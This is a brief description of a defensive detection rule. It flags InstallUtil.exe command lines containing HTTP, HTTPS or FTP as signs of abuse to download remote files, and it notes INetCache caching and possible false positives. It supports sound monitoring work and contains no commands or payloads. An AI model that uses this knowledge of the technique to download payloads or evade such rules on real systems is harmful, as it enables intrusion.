This detection rule monitors for the utilization of the .NET framework's InstallUtil.exe with the intent to download arbitrary files from remote locations using protocols such as HTTP, HTTPS, or FTP. Specifically, it focuses on instances where the command line includes these protocols, indicating potential malicious activity aimed at deploying unwanted files. Notably, any files downloaded through this process would typically be cached in the local INetCache directory. The rule identifies InstallUtil.exe either by its image path or its original filename, ensuring that all relevant instances are captured. This is particularly significant as InstallUtil.exe is frequently exploited for evading detection while executing .NET applications that perform suspicious actions, such as downloading files. Organizations should carefully monitor for such behavior as it may indicate an attempt to compromise the system security. False positives may exist due to legitimate use cases in software installation scenarios, thus requiring further investigation in ambiguous cases.